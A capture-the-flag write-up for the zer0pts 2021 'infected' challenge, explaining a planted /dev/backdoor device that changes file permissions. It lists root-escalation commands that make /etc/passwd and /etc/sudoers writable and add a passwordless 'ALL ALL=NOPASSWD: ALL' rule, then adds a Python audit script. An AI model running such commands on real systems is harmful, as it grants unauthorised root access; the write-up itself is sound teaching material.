
infected - zer0pts CTF 2021

tags: zer0pts CTF 2021 reversing

overview

We were given a backdoor binary. At first glance we can see some CUSE functions. It is easy to work out that the binary creates the character device /dev/backdoor, and that the device changes a file's permission according to input of the form b4ckd00r:<file path>:<permission>

What remains is the shell part. We want to see the contents of /root, and we effectively have arbitrary file read / write because we can change any file's permission to 777.

To read /root, we have to become the root user. The easiest way to become root is su, so our goal is to execute su or sudo su.

solution

We can solve this problem with the following commands:

  1. echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor
  2. echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd
  3. echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor
  4. echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers
  5. echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor
  6. sudo /bin/su

Then we are done.
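To make the permission numbers in the commands above concrete (511 is 0o777, 288 is 0o440, the normal mode of /etc/sudoers), here is an added example, not code from the challenge binary or the writeup, that parses the b4ckd00r:<file path>:<permission> command format and replays a sequence of commands from a defender's point of view, reporting which files would end up world-writable. It assumes the permission field is a plain decimal integer (consistent with the values used in the solution) and that the path is everything between the first and last colon; the exact parsing rules of the real device are not on the page, so both are assumptions, and the command lines fed to it are constructed here.

```python
import stat

# Magic prefix of the command format described in the writeup.
MAGIC = "b4ckd00r"

# Files a defender would most want to see flagged if their mode is loosened.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/sudoers"}


def parse_backdoor_command(line):
    """Parse one line written to /dev/backdoor.

    Returns (path, mode) or None when the line is not a well-formed command.
    Assumption: the mode is decimal (511 -> 0o777) and the path may contain ':'.
    """
    head, sep, perm = line.rstrip("\n").rpartition(":")
    if not sep or not perm.isdigit():
        return None
    magic, sep2, path = head.partition(":")
    if magic != MAGIC or not sep2 or not path:
        return None
    mode = int(perm, 10)            # decimal, as the writeup's values show
    if mode > 0o7777:               # only permission and setuid/setgid/sticky bits
        return None
    return path, mode


def describe_mode(mode):
    """Render a mode as the usual 9-character symbolic string, e.g. 0o777 -> 'rwxrwxrwx'."""
    return stat.filemode(stat.S_IFREG | mode)[1:]


def audit(commands):
    """Replay command lines and return (final modes per path, list of findings).

    A finding is produced when a file becomes world-writable or gains setuid/setgid,
    which is what a monitor watching writes to such a device would alert on.
    """
    final = {}
    findings = []
    for line in commands:
        parsed = parse_backdoor_command(line)
        if parsed is None:
            continue                # not a command for the device; ignore
        path, mode = parsed
        final[path] = mode
        tag = "SENSITIVE " if path in SENSITIVE else ""
        if mode & stat.S_IWOTH:
            findings.append(f"{tag}{path} made world-writable ({describe_mode(mode)})")
        if mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append(f"{tag}{path} given setuid/setgid bits ({describe_mode(mode)})")
    return final, findings


# Constructed sample: the device commands from the solution, plus one unrelated line
# (the passwd entry is appended to /etc/passwd, not written to the device, so it is ignored).
SAMPLE = [
    "b4ckd00r:/etc/passwd:511",
    "tako:x:1000:1000:tako:/home:/bin/bash",
    "b4ckd00r:/etc/sudoers:551",
    "b4ckd00r:/etc/sudoers:288",
]

if __name__ == "__main__":
    modes, hits = audit(SAMPLE)
    for path, mode in modes.items():
        print(f"{path}: {mode} -> {oct(mode)} ({describe_mode(mode)})")
    for hit in hits:
        print("finding:", hit)
```

Running it shows that 551 is 0o1047, i.e. owner gets nothing, group read, and other read/write/execute plus the sticky bit, which is enough for the append to /etc/sudoers to succeed before step 5 restores the normal 0o440.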